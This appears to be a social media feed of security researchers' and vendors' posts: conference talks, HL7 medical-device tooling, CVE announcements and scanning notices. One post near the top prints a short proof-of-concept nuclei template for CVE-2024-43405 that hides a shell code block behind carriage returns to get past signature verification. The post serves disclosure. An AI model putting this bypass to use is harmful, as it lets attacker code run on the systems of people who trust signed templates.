KT

Hello @brucon 👋🏻

How many of you realize how easy it is to get popped by running a random @pdnuclei templates? Even signed ones aren’t safe – it’s only a matter of time before this becomes a real attack vector 😏 PoC for CVE-2024-43405 id: benign-template info: name: Valid Template Example author: Wiz Research severity: Critical # digest: (whatever exists) # digest: \rcode:\r\r engine:\r - sh\r source: |\r echo "This is injected and executed!" > /tmp/payload.txt

Katie Inns, S-RM's Head of Attack Surface Management (ASM), shares her insight into the importance of ASM in keeping organisations safe from cyber attacks. hubs.li/Q02XWwt70 #AttackSurfaceManagement #Cybersecurity #Cloud #ShadowIT

Thanks to everyone that came along to my talk @44CON, you can find my blog post on the topic here: labs.withsecure.com/publications/h… and HL7Magic here: github.com/WithSecureLabs…

@44CON it’s been a pleasure, even after the last minute changes of schedule 😅 🫶🏼

It's World Patient Safety Day 2024! 🏥 This years focus- Improving Diagnosis for #PatientSafety. You guys know we're dedicated to innovation & cybersecurity to enhance #healthcare safety! Read: who.int/news-room/even… #WorldPatientSafetyDay #Cybersecurity #HealthcareInnovation

@shodanhq Is this open-source? If so do you have a link to the repo please? :)

New version of favscan is now available that fixes a bug in how it calculated hashes for some websites. Links are in the blog post: blog.shodan.io/deep-dive-http…

Make sure to check out the rest of the speakers! 44con.com/44con-2024-tal…

@44CON was my first ever conference, 7 years ago! I remember being completely blown away and having no clue what anyone was talking about 🤣

Excited to be speaking at @44CON in September! I'll be brining HL7Magic back for a special extended edition ✨

hl7magic: A Burp extension to allow for easy modification of HL7 messages sent to and from medical devices. dlvr.it/T67qFz #cyber #threathunting #infosec

4 days to go! Join our webinar in which we will: 💬 Discuss the importance of exposure management to mid-market security professionals 👀 Look into attack surface issues and exposure management’s role 🔎 Explore risk appetite and regulation issues 🖋withsecure.com/en/whats-new/e…

Made it to @riskybusiness news 🙊 news.risky.biz/risky-biz-news…

Finally got round to publishing the tool and accompanying blog post on my HL7/medical device research, presented at DC31 labs.withsecure.com/publications/h… github.com/withSecurelabs… #healthcare #medtech #DEFCON @defcon

@snyksec has discovered a new container breakout, known as CVE-2024-21626 Check out WithSecure Labs for more about the proof of concept and its demos for the docker / kubernetes / CI/CD environments: labs.withsecure.com/publications/r…

Applications for our UK Cyber Security Internship are now open, so why not spend the summer developing your hacking skills and gaining hands-on experience working with our cyber security specialists? Apply by March 15! emp.jobylon.com/jobs/217281-wi…

Wowzers...

Scan for Jenkins < 2.441 - Arbitrary File Read (CVE-2024-23897) using nuclei templates. Vulnerability Advisory -#SECURITY-3314" target="_blank" rel="nofollow noopener">jenkins.io/security/advis… Vulnerability Analysis - sonarsource.com/blog/excessive… by @Sonar_Research Nuclei Template - @sandeep/nqTESMRNHscR4wv9LABGua" target="_blank" rel="nofollow noopener">cloud.projectdiscovery.io/@sandeep/nqTES… #hackwithautomation #bugbounty #cybersecurity

As of 2024-01-18 we are scanning for NextGen Healthcare Mirth Connect appliances vulnerable to CVE-2023-43208 (pre-auth RCE). We see 441 vulnerable (2024-01-22 scan). Data shared in shadowserver.org/what-we-do/net… Make sure to upgrade to latest version: github.com/nextgenhealthc…

Noice 👌 blog.projectdiscovery.io/announcing-cve…